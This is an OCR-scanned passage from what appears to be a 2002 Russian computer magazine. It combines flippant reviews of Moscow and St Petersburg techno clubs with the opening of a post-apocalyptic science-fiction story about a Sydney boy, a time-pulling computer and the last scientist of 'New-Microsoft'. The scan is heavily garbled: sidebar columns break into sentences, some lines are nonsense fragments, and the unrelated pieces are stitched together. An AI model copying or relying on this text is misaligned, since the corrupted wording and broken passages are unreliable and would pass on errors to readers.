ся спать еще рано, точнее, уже поздно, да и ехать домой совсем 
не хочется. Так что искомые “все” отвисают в Миксе часов до 
12:00, чтобы затем отправиться в Остров, где праздник продол- 
жается часов до 5-8 вечера. 


Впрочем, не думай, что будет скучно или сонно - как правило, 
здесь играет очень качественное жесткое техно - Кубиков (по- 


Южанка ходим в те, о которых написано ниже. 


стоянный гость в этом клубе) способен разбудить кого угодно 
(специальное предложение - смерть на танцполе), даже бывало- 
го артиллериста, привыкшего спать под гром пушек. Хотя такого 
типа ребята в “Миксе” не появляются. Публика здесь когда-то 
была совсем совсем богемная. Теперь - попроще, но и попопсо- 
вее. Одним из вестников близкого конца выглядел суровый муж- 
чина, похожий на водителя грузовика, то ли каким-то чудом вы- 
валившийся из клуба, то ли каким-то странным образом матери- 
ализовавшийся и, проходя мимо клуба, с презрением заорав- 
ший: “Жлобье, в ваш гребаный клуб пива даже нормального 
нельзя зайти выпить!”. Hy, не подают там очаковского... Что ж 
теперь делать... 


Сердце 

Относительно недавно (несколько месяцев назад) открывшийся 
клуб. Диджеи из закрытого некоторое время назад “Тринадцать” 
- Коля и Град. Из ветеранов - Милан, гигантский человек из быв- 
шей Югославии. 

Иногда в Сердце стоит сходить. Хотя бы для того, чтобы послу- 
шать Дейва Симэна (Dave Seaman), которого не так давно пока- 
зали московской клубной общественности. Однако иногда, осо- 
бенно если народу битком, бывает крайне душно - кондиционе- 
ры работают из рук вон плохо. 

Клубное пространство организовано довольно странно - дид- 
жейское, ммм, скажем, место находится в центре танцпола, мол, 
смотри, вот же он, стоит - как живой. 


Цеппелин 


Когда-то ходить в Цеппелин было очень модно и хорошо... Сей- 
час все точно так же здорово - но, к сожалению, некоторая спе- 
цифика индустрии не позволяет одному клубу долго быть в мо- 
де. Когда поток восхищенных посетителей слегка схлынул, оста- 
лись все те, кому этот клуб на самом деле симпатичен: молодые 
интеллектуальные люди в кроссовках Рита и с фотоаппаратом 
Ломо сумке, разнообразные посетители с обостренной реакцией 
на окружающий мир, модели, блондинки с короткими стрижками 
(гы) и продвинутые директора пароходов на отдыхе :). 

Музыка - жесткая (техно-техно). То же самое в дизайне, минима- 
листичном и функциональном. Рекомендован к посещению чил- 
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Парк-Авеню Диско 


Корабль (Рында) 


Ам 


братства. Как и откуда оно берется (13 
крайности. Да, сам корабль называется - “41: 


16 тонн 


: a 
Один из самых долгоживущих клубов в Москве. Никто“не думал, 
что заведение, сменившее чебуречную у метро “1905 года” про- 
держится так долго. Вместо “обжорки”, выдержанной в концеп- 
туальном “грузинском” стиле, появился английский паб. Причем, 
настоящий английский, без дураков: на втором этаже посетите- 
ля на входе встречает ундервуд конца девятнадцатого века. 
Плюс специфическое оформление пространства и приглашен- 
ные технозвезды. В 16 тонн ходят именно на них: Pizzicato V, 
Alfred More. Да кто только не наведывается в тонны! По будням 
тоже неплохо - но не феерия. 


Пропаганда 


Самый демократичный клуб - разностильная публика, музыка, не- 
притязательный дизайн. Здесь некого и нечего стесняться, беспо- 
коится о том, что ботинки не от Gucci - лучше что-нибудь похрено- 
Bee, потому что бисс! все равно отдавят. Всегда много самых раз- 
ных людей. Ночью сюда ходят слушать музыку, днем - обедать. 
Демократичность подается как самая главная черта клуба. Сраба- 
тывает. Иногда на входе охранники вяло, уже, наверное, раз в пя- 
тисотый, объясняют что-то про дресс-код и закрытую вечеринку. 
Причина, как всегда, в другом - просто дышать уже в небольшом 
помещении нечем. Постоянно привозят каких-нибудь буржуйских 
DJ. Как ни странно, на резидентов клуба иногда приходит даже 
больше народу, чем на приглашенных звезд. Во всяком случае, на 
четверги Санчеса не прорваться. Так что раз уж пришел, то при- 
дется танцевать, потому что стоять там точно негде. 


Остров 


Похоже, afterparty начинает постепенно входить в моду. Даже 
распорядок многих московских клубников начинает меняться - 
ложиться в девять вечера, просыпаться в четыре утра и отправ- 
ляться на самую “изюминку”. Привычный для тебя распорядок, 
я угадал ;)? Как раз в четыре ночи (все же все равно ведут ноч- 
ной образ жизни :)) хочется оторвать задницу от компьютера и 
отправится куда-нибудь, поклубиться и расслабится. Спать позд- 
но, вставать - рано, вот оно и появляется - afterparty. 

Недавно открывшийся клуб Остров как нельзя лучше подходит 
для таких целей. Еще там можно увидеть и услышать диджея 
Данилу с его превосходной коллекцией разнообразной музы- 
ки (Южанка утверждает, что там есть все). 

Так что, учитывая то, что afterparty заканчивается в восемь ве- 
чера, есть шанс, что все мы будем вести правильный образ 
жизни: спать ночью, а тусоваться - утром, пока еще стоит ;). 


Министерство 


Говорят, что этот клуб назвали по образу и подобию британско- 
го монстра - Ministry of Sound. 


‘О стоит зеркал 


И реРтеблаевее - нет. Пр: 
ий-жесткий х в исполнении"О3 Вэзтеди Ичворится 


‘Ko гда-то Me cat НИС 


_- тожезможно,.пусть 
времячте зад. 
Да, всем помнить - ф 
модное - надевать. 


Bos6tino очень здорово. Сейчас 
и не так весело, как некоторое 


= Г. 


онтроль на входе жесткий, так чт 


Питерцы: ee 


Mama 

Mama, пожалуй, самый великий и почетный питерский тех- 
ноклуб. По статусу чем-то похож на Пропаганду в Москве: 
непритязательный дизайн, любые люди на танцполе - от мо- 
лодежи до солидных господ. Всегда самая жесткая музыка. 
Даня Шаповалов рассказывал о том, как утром открывают ок- 
на и на улицу идет пар, что свидетельствует о большом коли- 
честве людей, которые любят дышать. Сам в Маме ни разу до 
утра не был - не довелось. 

На первом этаже - танцпол с советским диско. 

Пару лет назад в Маме играл Funci Porcini, с тех пор возникла 
традиция ездить в Маму на разнообразных звезд. 


Грибоедов 


Грибоедов похож на андеграунд таким, как мы привыкли его 
представлять по старому клипу Продижи. Кирпичные стены чуть 
ветховатые диваны, негры в кепках задом наперед и мультфиль- 
мы про шпионов в телевизоре над баром. Когда-то был самым 
модным - сейчас просто самое спокойное, милое и тихое место. 
Ну, относительно тихое, конечно. 

(Специальное предложение - познакомиться с девушкой и увезти 
ее на Соловки. Гулять. 


Пар 


Клуб, действующий подобно мгновенному очистителю от 
всего, что было выпито и съедено за ближайшее время. 
Настоящее зло. Сколько спиртного в тебе бы ни было, что 
бы ты ни употреблял - при входе в Пар чувствуешь себя 
снова трезвым, плюс небольшой холодок невесть где под- 
стерегающей тебя опасности. Неизвестно почему, может, 
из-за того, что когда-то в этом помещении располагался 
морг, и сотни не упокоенных душ так и жаждут вселиться 
в новенькое, пусть и немного подточенное излишествами 
тело кого-нибудь из клубников. 

В бывшем морге играет электронная музыка, но по-хорошему, 
надо было там устраивать тусовки для готиков - всех тех, кто лю- 
бит гнетущую, чуть страшноватую атмосферу. 

Специальное предложение - вызывание зомби. Пусть всем 
даст жару :). |= 
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СПУЖЬЙ КОНТРОПЯ 


Niro Вместо пролога 

(niro@real.xakep.ru) Вся земля в этом месте была жесткой спекшейся коркой, на высоте пяти километ- 
ров над ним зашкаливали все датчики радиоактивности. Площадь около ста квад- 
ратных километров представляла собой несколько огромных безразмерных воронок с 
прилегающей к ним зоной полного разрушения. Здесь не было трупов - превратив- 
шись в пар, они давно смешались с пролетавшими над этим местом радиоактивными 
облаками. Здесь практически не осталось зданий - только глубоко упрятанные в 
землю остатки фундаментов. Здесь не было ничего. И только на глубине двухсот 
пятидесяти метров под землей через всю эту уничтоженную взрывами равнину ни- 
точкой пролегал тонкий кабель в несколько жил. Когда-то он в компании с еще 
тысячей таких же собратьев, ныне растворившихся в ядерном пламени, соединял 
весь мир и лежащий в руинах город Hbw-MS. И он был цел. 


Это была красивая легенда. Каждый ребенок, достигший семи-восьми лет от роду, 
мог рассказать ее, причем с полным пониманием всех слов и терминов, употребля- 
емых в ней. Все сомневавшиеся давно были убеждены теми, кто верил, и сами ста- 
ли верить. Многие из тех, кто не смог поверить, покончили с собой. Эта легенда 
была единственным, что удерживало практически всех оставшихся в живых от гибе- 
ли. Вся Земля стояла на краю пропасти - и лишь несколько страниц печатного 
текста, хранящихся в Последнем Музее, не давали ей туда сорваться. 
Четыре страницы. Две тысячи слов. Их знали все. Наизусть. Без того, чтобы не рас- 
сказать эту легенду, матери всех выживших детей не ложились спать - они ежевечер- 
не нашептывали ее текст своим чадам, безмятежно засыпавшим под сладкие слова... 
“Microsoft Windows 95 - операционная система для 1ВМ-совместимого компьютера. 
Операционная система - это основа любого программного обеспечения; она создает 
среду, в которой работают все компьютерные программы. Windows 95 вобрала в се- 
Их было ровно бя системные функции, р. Ц выполняла MS-DOS. Она представляет собой 
eZ мощную и в то же время простую в обращении операционную систему... 
к e ie Ms Sel. Так начиналась эта легенда. 


ольше ни Все люди Земли - все двести пятьдесят тысяч - молились о том, что когда-нибудь 
меньше. слова этой легенды войдут в их дом счастливой реальностью, надеялись, что 
Шестнадцать очень скоро (раньше, чем от лучевой болезни умрет последний человек) их жизнь 
мокрых, дрожащих вернется в прежнее русло - зазеленеют леса, запоют птицы, планета оживет от 
от жуткого холода постъядерного сна и вновь подарит людям радость бытия. Все они верили. 
человек. Три И только Мартин Гринберг, мальчишка из Сиднея, ЗНАЛ, что это правда. 


женщины (у одной 


на руках девочка Шестнадцать. Странное число. Мальчик во все глаза смотрел перед собой. Их было 


ровно шестнадцать - ни больше ни меньше. Шестнадцать мокрых, дрожащих от жут- 


лет пяти), десять кого холода человек. Три женщины (у одной на руках девочка лет пяти), десять 
мужчин разного мужчин разного возраста (от тридцати до шестидесяти лет) и двое мальчиков лет 
возраста (от по десять-двенадцать (судя по тому, как они жались к стене, их родителей среди 
тридцати до присутствовавших здесь не было). На всех них были надеты оранжевые спасатель- 
шестидесяти лет) ные жилеты, из-под которых с курток и пальто тоненькими ручейками лилась вода 
и двое мальчиков - лужа вблизи ног каждого постепенно увеличивалась. 

лет по десять- Все шестнадцать испуганно смотрели по сторонам, разглядывая интерьер зала, в 


котором они сейчас находились, инстинктивно стараясь держаться группой. Одна 


двенадцать (судя из женщин (та, что была с ребенком), выглядела очень плохо, свободной рукой 


по тому, как они все время пыталась уцепиться за гладкую стену, но все время соскальзывала. 
жались к стене, их Вскоре она упала на колени, девочка выскользнула у нее из рук, но продолжала 
родителеи среди крепко держаться за мамину шею, что-то шепча себе под нос. Стоящий рядом пожи- 
присутствовавших лой мужчина попытался помочь женщине подняться, но быстро оставил эти попытки 
здесь не было). - сил явно не хватало. 


Крупная дрожь сотрясала тела шестнадцати, однако постепенно их лица и руки, 
поначалу долгое время остававшиеся белыми, розовели, дрожь прекращалась, набе- 
гая только периодически. Мальчики, стоящие чуть в стороне, переглянулись, од- 
новременно развязали шнурки, удерживающие на них спасательные жилеты, и от- 
швырнули сами жилеты в сторону, бормоча со злостью какое-то имя или название 
чего-то. Глядя на них, так же поступили и почти все остальные, только женщина, 
сидящая на полу, не последовала их примеру - у нее не было сил. 

И в эту секунду все шестнадцать одновременно сосредоточили свое внимание на 
Мартине, который, словно окаменев и не веря в результат своих экспериментов, 
встретился с ними взглядом. Шестнадцать пар глаз сверлили его, будто надеясь 
без слов узнать, кто он и что происходит. Мальчик вдруг понял, что от волнения 
даже не моргает. Глаза стали слезиться, он стер слезы рукавом. 

- Какого черта? - вдруг произнес один из мужчин. Его слова вывели из оцепене- 
ния всех - одновременно заговорили с мальчиком и друг с другом все шестнадцать 
человек. Мартин понял, что родным для них является не только английский язык - 
проскочили фразы на немецком и французском. Но ответить он им не мог - даже 
по-английски. Он просто не знал, что им сказать. Но хуже всего было то, что 
Мартин не знал, ЧТО С НИМИ ДЕЛАТЬ. Он тупо смотрел на переставшую увеличивать- 
ся лужу ледяной воды и понимал, что остался только один выход. 

Из оцепенения его вывела женщина, которая отставила свою дочь в сторону, все- 
таки поднялась с колен и направилась неуверенными шагами к Мартину, шепча что- 
то о Боге. Мальчик испуганно перевел взгляд на клавиатуру и быстро набрал не- 
сколько команд. 

И когда до Мартина оставалось три или четыре шага, все эти люди исчезли, слов- 
но их и не было никогда в этой комнате - только большое мокрое пятно у стены 
напоминало об их недавнем присутствии здесь. Хотя нет - были еще два оранжевых 
спасательных жилета. 

Мартин Гринберг осторожно поднялся из-за компьютера, очень медленно прибли- 
зился к ним и взял один из них в руки. Тот еще хранил в себе холод океанской 
воды. На жилете белыми буквами было написано: “ТТТАМТС”. 


09ч august/08/2002 ® 


Сорок восемь лет назад их было сто тридцать четыре человека - ученых, обслуги, охранников. 


- Я сделал это, 
обратно на пол. 
А шестнадцать несчастных вновь вернулись на двести 
лет назад, в ледяные волны Атлантического океана, 
чтобы умереть там через несколько минут и так и не 
успеть никому рассказать о чуде, которое с ними 
сотворил мальчик из далекого будущего, который по- 
сле этого так жестоко с ними обошелся. 


прошептал Мартин, опустив жилет 


Эта история началась около четырех месяцев назад, во 
время очередного налета. Безумная эскадрилья страте- 
гических бомбардировщиков выполняла свои задания с 
дьявольской точностью и методичностью, но к бомбеж- 
кам уже давно привыкли, как к чему-то неизбежному, 
как к части жизни, без которой не проходит и неде- 
ли. Самолеты приближались к окрестностям Сиднея два 
раза в неделю - утром во вторник, в половину девя- 
того, и ночью с субботы на воскресенье, в связи с 
чем эту ночь все проводили в бомбоубежищах - домаш- 
них или общественных, куда направлялись еще с вечера 
по привычке и где даже не слышали разрывов на по- 
верхности - настолько обыденным было это явление. 
За последние несколько лет от налетов киберавиации 
не погиб ни один человек - расписание входило в 
детей с молоком матери, взрослые сверяли по ним 
часы. Время, потерянное в укрытиях, люди с лихвой 
компенсировали чтением (правда, литературы в жилой 
зоне сохранилось очень мало), занятиями спортом, 
беседами о прошлом, которое сохранилось только в 
воспоминаниях тех, кто когда-то читал об этом. 
Мартин, как и все дети вокруг него, не считал эти 
налеты чем-то необычным (они родились уже после 
Большой Войны и не видели всего того ужаса, унич- 
тожившего Землю). В бомбоубежищах они играли в 
свои, рожденные суровым временем игры (наполненные 
войной и дикими криками), периодически то пугая, 
то развлекая взрослых, сидящих вокруг. Гринберг- 
Младший не отличался от своих сверстников, так же, 
как и они, проводил время бомбежек (хотя иногда 
отец не отпускал его в общественное укрытие в цен- 
тре города, где проходили всяческие соревнования 
среди детей разных кварталов, и оставлял дома - 
порой в наказание, порой из скрытого страха; как и 
многие взрослые, он был убежден, что когда-нибудь 
расписание налетов неожиданно изменится или взрывы 
проникнут на большую глубину, или случится еще 
что-нибудь, неподвластное человеческому пониманию). 
Как всегда, это был вторник, раннее утро. Сирены, 
конечно же, завыли, но предупреждать было некого - 
многие еще с вечера ушли на ночь в укрытия, чтобы 
иметь возможность вдоволь выспаться, а не мчаться 
в бомбоубежище, сломя голову. Мартин тоже спал без 
задних ног - вчера выдался трудный день, они с от- 
цом разгребали завалы в центральном районе города, 
где раньше было то, что называлось коротким непо- 
нятным словом “Сити”. Ходили разговоры о том, что 
где-то под городом, на глубине метро или даже еще 
ниже, могло сохраниться хоть что-нибудь (никто не 
знал, что именно, но загадочное “что-нибудь” тол- 
кало на поиски многих искателей приключений, часть 
из которых нашли свою могилу в развалинах среди 
оплавленного стекла и бетона). 

Вчера Мартин впервые скрыл от отца свою находку. 
Когда они спустились вниз на глубину около ста мет- 
ров по провалу над туннелем метро, Гринберг-младший 
увидел дверь в скальной породе. Она сливалась по 
цвету с окружающими камнями, по причине чего была 
практически незаметна. Мартин кинул на нее незамет- 
ный взгляд, потом отвлек отца каким-то разговором, и 
они спустились еще дальше, где проверили пару раз- 
давленных взрывом вагонов (в которых не осталось да- 
же трупов - животные очень быстро перестроились, 
мертвецы пошли в ход с ужасающей быстротой). Они на- 
шли несколько сумок с вещами, пару ботинок, практи- 
чески целых, но со следами собачьих зубов. В целом 
день можно было считать удачным, не считая ушиблен- 
ного плеча отца и нескольких царапин на шлеме Марти- 
на, каждая из которых могла стать роковой трещиной. 
Мальчик, поднимаясь наверх в неуклюжем противорадиа- 
ционном костюме, еще раз взглянул на неприметную, HO 
с виду массивную дверь с разноцветным значком в цен- 
тре и решил спуститься сюда как-нибудь в одиночку... 


Качнулись стены - не больше, чем обычно. Наверху 
самолеты проходили над пустыней, которая когда-то 
называлась Австралия. Бомбили те места вблизи горо- 
да, где в давние времена, возможно, находились ка- 
кие-то военные объекты - бомбили с завидным упор- 
ством; можно было только удивляться, сколько бое- 
комплекта было заготовлено в свое время кучкой су- 
масшедших, чтобы война могла продолжаться уже около 
пятидесяти лет. Каждый день пятьдесят лет подряд 
самолеты стратегической авиации заправлялись, за- 
гружались под завязку бомбами, поднимались в воздух 
автопилотами-роботами и проходили одним и тем же 
маршрутом над одними и теми же целями. Самих целей 
не было уже много лет, но бомбы вгрызались в не- 
счастную землю, и это неправда, что бомба дважды в 
одну воронку не попадает - еще как попадает! 

Мартин поднялся с лежанки, прислушался к тому, что 
происходит наверху. Эхо взрывов было очень далеким 
- благо, глубина укрытий была выбрана достаточная, 
даже потолок не осыпался. Если судить по часам, 
висевшим над выходом, через пятнадцать минут само- 
леты уйдут на базу. Где располагалась эта база, не 
представлял себе никто из ныне живущих - как не 
представлял, каким образом целых пятьдесят лет 
стратегические бомбардировщики боронят землю окре- 
стностей Сиднея. Это было абсолютно естественным, 
не подлежащим обсуждению. Это было ВСЕГДА. 

И, как часто случается в жизни, Мартин задал сам 
себе вопрос: 

- Но ведь кто-то же это начал? 

И, как это часто бывает с детьми в его возрасте, 
он захотел найти ответ. Такие вопросы, словно за- 
ноза, застревают в детском сознании и просто тре- 
буют ответа; дети становятся одержимы идеей, Идеей 
с большой буквы. Одержим стал и Мартин. 

Первое, что он решил сделать, - открыть железную 
дверь с разноцветным значком. 


Лицо этого человека было таким же желтым, как зна- 
ки на стенах, символизирующие могущество нерушимой 
корпорации; старость избороздила его морщинами, 
спускающимися на дряблую шею. Острый нос на высох- 
шем лице хищным крючком смотрел немного вниз, щеки 
ввалились. Дополняло жуткую картину полное отсут- 
ствие волос на черепе. 

Его звали Линдон Дерек, и он уже сорок восемь лет 
находился под землей, в огромном исследовательском 
центре, когда-то бурлившем людьми, наукой, экспе- 
риментами и ЖИЗНЬЮ. Последний его товарищ скончал- 
ся больше пяти лет назад - по-видимому, от инсуль- 
та, уж очень он страдал от повышения артериального 
давления. Дерек помнил тот день и час, когда Самю- 
эль нелепо взмахнул руками и скатился под стол_в 
той самой комнате, в которой находился сейчас Пин- 
дон. Половина его тела отказалась служить сразу 
же, повисли правые рука и нога; Дерек понимал, что 
все эти симптомы достаточно грозные, что Самюэлю 
нужно помочь, но доктор умер задолго до этого про- 
исшествия, выпив практически все транквилизаторы, 
которые хранились в специальном сейфе Центра. 
Линдон молча стоял и, глядя в глаза своему послед- 
нему другу, успокаивал самого себя. Ничего нельзя 
было исправить - все они постепенно оставили этот 
бренный мир и ушли, каждый по-своему - кто во сне в 
своей собственной постели, кто застрелился, кто вы- 
шел на поверхность без противорадиационного костю- 
ма, чтобы напоследок вдохнуть аромат отравленной 
родины, кто от многочисленных болезней, сражавших 
ученых и их обслугу с поразительным постоянством. 
Сорок восемь лет назад их было сто тридцать четыре 
человека - ученых, обслуги, охранников. Сейчас на 
поверхности пространство перед Центром украшают сто 
тридцать два холмика и один скелет - Самюэля зако- 
пать Линдон уже не смог, силы были не те. На первых 
нескольких десятках могил еще можно было увидеть 
маленькие пластиковые таблички с именами и датами 
рождения и смерти. На последних уже не было ничего, 
кроме выцветших бэджей с фотографиями, на которых 
все они были молодыми. 

Периодически Дерек выходил на поверхность (пример- 
но раз в две-три недели), чтобы поправить холмики, 
которые пытались сровнять с землей неуступчивые 
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радиоактивные ветра, чтобы вернуть на место сброшенные таблички, покосившиеся 
кресты, унесенные бэджи. Судя по всему, многие таблички уже сменили своих вла- 
дельцев, некоторые кресты и нагрудные знаки унесло ветром довольно далеко от 
кладбища - но это не волновало Линдона, как уже ничто не могло заставить серд- 
це этого одинокого профессора биться быстрее. 

Он все видел в своей жизни; он похоронил всех своих друзей; он был на самой 
страшной войне; он был смотрителем самого жуткого погоста в бывшей Северной 
Америке. Когда-то давно (Линдон считал, что это было в прошлой жизни) ему до- 
велось прочитать в популярном журнале статью о том, что у сотрудников киносту- 
дии Джорджа Камерона, снявшего незабываемый “Титаник”, на футболках были над- 
писи: “Вы не можете меня испугать - я работаю с Камероном”. С тех пор, как 
случилась Большая Война, Дерек знал свой девиз, а после смерти Самюэля написал 
его над входом в Центр красной краской, найденной в одной из многочисленных 
лабораторий. 

“ВЫ НЕ МОЖЕТЕ МЕНЯ ИСПУГАТЬ - Я УБИЛ ВЕСЬ МИР”. 

Некому было читать эти слова - в окрестностях, впрочем как и на всем североа- 
мериканском континенте, не осталось в живых ни одного человека, кроме самого 
Линдона. Жизнь Дерека с каждой смертью теряла смысл; он уже давно, около двад- 
цати лет назад, прекратил заниматься созидательной, фундаментальной наукой, за 
которую просто зубами держались его коллеги, - он бросил ее, когда полностью 
осознал свершившееся. Некому будет воспользоваться плодами трудов его и его 
коллег, никто не оценит по достоинству научные изыскания одного из величайших 
исследовательских центров, принадлежащего к великой империи Нью-Майкрософт. 
Многие его друзья согласились с ним, но у них хватило сил порвать нить своих 
жизней. Ярче всего отпечаталось в памяти Линдона то, как руководитель Центра, 
Милош Радович, решив покончить с собой, отравил несколько охранников большими 
дозами снотворного, отобрал у них оружие и прихватил с собой на тот свет еще 
одиннадцать человек, после чего пустил себе пулю в раскрытый рот. 

Люди сходили с ума постепенно, по одиночке приходя к мысли о бесцельности су- 
ществования в этом подготовленном к вечности Центре. Сначала доктор брал их Ha 
лечение, но потом понял необратимость происходящего и помог парочке из них 
выйти на поверхность в одних тренировочных костюмах. Общественное мнение в ли- 
це оставшихся разумными ученых осудило этот поступок, доктор был репрессирован 
и посажен в подвальное помещение, где благополучно перегрыз себе вены на пра- 
вой руке и вылизывал раны до тех пор, пока кровь не перестала свертываться. 
Его нашли в блестящей багровой луже лицом вниз. На стене был кровью намалеван 
знак их фирмы с незначительными дополнениями, благодаря которым он стал напо- 
минать нацистский крест. 

С Самюэлем Кристенсеном они прожили вдвоем довольно долго, проводя много вре- 
мени в одиночестве, каждый за своим компьютером, встречаясь только за приемами 
пищи, которые от длительного подземного заточения стали нерегулярными. Лениво 
поглощая синтетические суррогаты из неприкосновенного запаса, они столь же вя- 
ло спорили. Темы их прений были неизменны - война и ее последствия. 

“Хороший был оппонент, - с грустью вспоминал Линдон. - Он один из тех, с чьей 
смертью у меня тоже пропал интерес к жизни”. 

Уже около года Дерек подумывал о том, как покончить с собой. Способов было 
много - лекарств после себе доктор оставил предостаточно, оружия тоже было 
больше чем необходимо; в конце концов, всегда можно выйти на последнюю прогул- 
ку на кладбище, причем даже можно успеть выкопать себе могилу и лечь в нее. 
“Вот только забросать землей меня будет некому...” - грустно констатировал 
Линдон и бросал эти мысли. 

Он превратился в робота; он ел, пил, спал, совершал прогулки по Зимнему Саду, 
играл в карты с компьютером. Пытался написать мемуары, но, поняв, что прочи- 
тать их будет некому, бросил. И вот настал день, когда он осознал - он един- 
ственный человек на Земле. Последний оставшийся в живых в горниле ядерной ка- 
тастрофы. И эта мысль подкосила его. Он перестал есть, практически не вставал; 
он целые дни проводил на диване в центральном зале, глядя на эмблему сверхкор- 
порации на потолке и тайком неизвестно от кого утирая слезы в уголках глаз. 
Линдон с нетерпением ожидал сумасшествия. Он засыпал и просыпался с одной лишь 
мыслью - поскорее сойти с ума, чтобы его сознание перестало существовать и по- 
нимать весь кошмар происходящего. Он уже понял, что сил самому оборвать свою 
жизнь у него не найдется, поэтому жаждал, чтобы разум растворился, слился с 
окружающим ужасом, и сам ужас перестал быть для него чем-то необычным, трево- 
жащим. Остался только один короткий шаг... 

Тихий мелодичный сигнал вывел его из состояния задумчивости. Сигнал, прозву- 
чавший в этих стенах впервые за последние сорок восемь лет. Линдон, тяжело 
опираясь на спинку дивана, поднялся и посмотрел на экран компьютера в противо- 
положном конце зала. Старческое зрение подводило его, но он точно знал, что 
сейчас в системном трее появился маленький конвертик с двойной синей стрелкой. 
Это означало: “Вам пришла почта”. 

Дерек сделал два шага к компьютеру и рухнул на пол, потеряв сознание. 


Выбраться незамеченным оказалось намного проще, чем ожидал Мартин, приготовивший 
три оправдания для отца и два пути отступления в случае раскрытия его побега. 

Он просто во время очередного налета, надев защитный костюм, отправился совсем в 
другую сторону - к разрушенному метро. Бомбы в той части города не падали - это 
Гринберг знал точно, убедившись как-то раз в этом с вершины небольшого уцелевше- 
го холма; воронок в районе станции метрополитена не было. На него не обратили 
внимания; в противорадиационном костюме узнать кого-либо было достаточно сложно, 
если только человек специально не обозначал себя какими-нибудь знаками или над- 
писями. Костюм Мартина был безликим; никто бы не сказал его отцу, что видел 
мальчика во время бомбежки не в укрытии, а под открытым небом. 
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“Вот только забросать землей меня будет некому... 


Гринберг-младший сумел побороть в себе страх перед 
открытым пространством - никогда еще на протяжении 
всей своей жизни он не был в запрещенное время на 
поверхности. И хотя он точно знал, что самолеты ни 
на метр не отклонятся от курса, дрожь в ногах со- 
провождала его примерно в течение часа. Ежеминутно 
поглядывая на небо, он постепенно продвигался впе- 
ред; когда его взгляд коснулся дна разрушенного мет- 
ро-туннеля, в небе просвистела первая бомба. Ощуще- 
ния были, конечно же, не те, что в укрытии на при- 
личной глубине, - земля внезапно ушла из-под ног, в 
спину ударил мощный порыв ветра, а через пару се- 
кунд в ушах загрохотало, да так сильно, что Мартин 
зажмурился от накатившей волны ужаса. Он никогда не 
слышал реальных звуков взрыва бинарной бомбы; он по- 
нял, что теперь никогда не сможет спокойно спать в 
укрытии во время бомбежки, и представил себя на ме- 
сте своего отца, который иногда при колебании плафо- 
нов под потолком тревожно поглядывал на сына и не- 
лепо улыбался, пытаясь этим его успокоить. 
Спускаться вниз пришлось достаточно быстро - рев 
наверху не прекращался ни на мгновенье. Вскоре по- 
казалась наполовину присыпанная бетонной крошкой 
заветная дверь. Мартин остановился в пяти шагах от 
нее и пристально взглянул на незнакомую эмблему. 
Это напоминало колышущийся на ветру флаг с челове- 
ческим лицом в центре. Человек на эмблеме мирно 
улыбался входящим на протяжении многих лет; вот и 
сейчас при приближении к двери Гринберг почувство- 
вал волну тепла, исходящую от этого лица. Ему стало 
спокойнее, намного спокойнее; дрожь прошла. Он по- 
нимал, что за дверью с такой эмблемой не может быть 
ничего опасного, угрожающего для жизни. И он подо- 
шел к ней вплотную, коснувшись шершавой, немного 
погнутой взрывной волной поверхности двери; провел 
перчаткой по нарисованному лицу; костюм не давал 
Мартину ощутить холод металла, но мальчик почувст- 
вовал его интуитивно. Он отстегнул от бедра малень- 
кую саперную лопатку и принялся расчищать периметр 
двери от бетонной крошки и арматурных обломков. 
Работа была трудной - запас кислорода в костюме 
был ограничен, Мартину приходилось рассчитывать 
каждое движение, чтобы не дышать слишком интенсив- 
но. Он хотел расчистить вход сегодня, за одну по- 
пытку. В следующий раз Гринберг надеялся присту- 
пить к открыванию двери. Через полтора часа пока- 
зался комингс двери - весь периметр был очищен. 
Мартин постарался на славу - он очень боялся, что 
дверь будет открываться наружу, и даже самая ма- 
ленькая преграда не даст ей открыться. Напоследок 
он осмотрел стальной лист с эмблемой, нашел на нем 
несколько замочных скважин и завалил дверь большим 
покореженным листом пластика, вытащенным из сго- 
ревшего вагона метро. 

Во время следующего налета, ночного, он еще позд- 
ним вечером выбрался из укрытия, взяв собой еще 
пару комплектов кислородных баллонов, и направился 
к таинственной двери. Несколько фонарей тоже ока- 
зались нелишними; мрак, царивший в метро, был не- 
пробиваем для глаз. 

Мартин отвалил в сторону лист пластика и извлек из 
бездонных карманов приготовленные отвертки, старые 
ключи, маленькую ножовку (на нее он посмотрел с 
сожалением - размеры пилки никак не соотносились с 
предполагаемой толщиной листа двери). 

Несколько ключей он сразу отбросил в сторону - они 
просто не подходили к скважинам. Две отвертки 
очень быстро сломались - от волнения Гринберг, 
вместо того чтобы почувствовать внутренности зам- 
ка, сильно надавил на рукоятки и обломал их. 

- Отец, конечно же, сразу обнаружит их пропажу, - 
прошептал Мартин, но это не остановило его. Он 
продолжал ковыряться в трех замках этой двери в 
течение двух с половиной часов. Грохот разрывов на 
поверхности стал для него привычным, не то что бы 
он перестал на него реагировать, но его увлечен- 
ность происходящим поставила перед ним непроницае- 
мую завесу. Мартин только тогда замечал, что само- 
леты еще в воздухе над Сиднеем, когда взрывная 
волна заставляла его уронить отвертку или кусок 
проволоки, из которого он навертел себе крючков 
разных размеров. 


— грустно констатировал Линдон и бросал эти мысли. 


Время шло, кислород заканчивался. Дверь по-прежнему 
оставалась закрытой. Мартин едва не выл от досады; 
он четко видел, что за этой дверью решение многих, 
если не всех проблем. Ему просто необходимо было 
войти внутрь. Он с горечью пнул дверь ногой и усел- 
ся на камни, перебирая в руках самодельные отмычки. 
Вдруг незнакомый звук вмешался в происходящее. 
Что-то большое падало с неба. Падало не со свис- 
том, свойственным стабилизаторам бомбы, - звук был 
низким, густым, гипнотизирующим. Мартин приподнял- 
ся и вышел на свободное место, с которого было 
видно ночное небо в горловине ущелья. Какое-то 
темное пятно неслось сквозь облака, периодически 
закрывая собой звезды. И это пятно приближалось. 
Гринберг никак не мог понять, что это, но дрожь, 
вновь появившаяся в ногах при появлении этого звука, 
заставила его начать спускаться ниже, вглубь тунне- 
ля. Найдя в знакомых лабиринтах ответвление, мальчик 
втиснулся в небольшую щель и замер в ожидании. 

Через мгновенье звук внезапно прекратился. Мартин 
высунул голову наружу - и тут же ударная волна об- 
рушилась на него, прижав к стене расщелины. Это 
был не взрыв бомбы - что-то упало с неба, завалив 
наполовину выход из метро. Клубы бетонной пыли за- 
полонили все вокруг Мартина, луч фонаря не мог 
пробиться сквозь них и плясал всего в паре метров 
перед мальчиком световым пятном. 

Пыльная преграда рассеялась через минут десять - все 
это время Мартин неподвижно просидел на своем месте, 
успокаивая бешено колотящееся сердце и глядя на 
стрелку кислородного баллона, постепенно переползаю- 
щую из желтого сектора в красный. Когда луч фонаря 
смог достать до противоположной стены шахты метро, 
Мартин выбрался из своего убежища и взглянул вверх. 
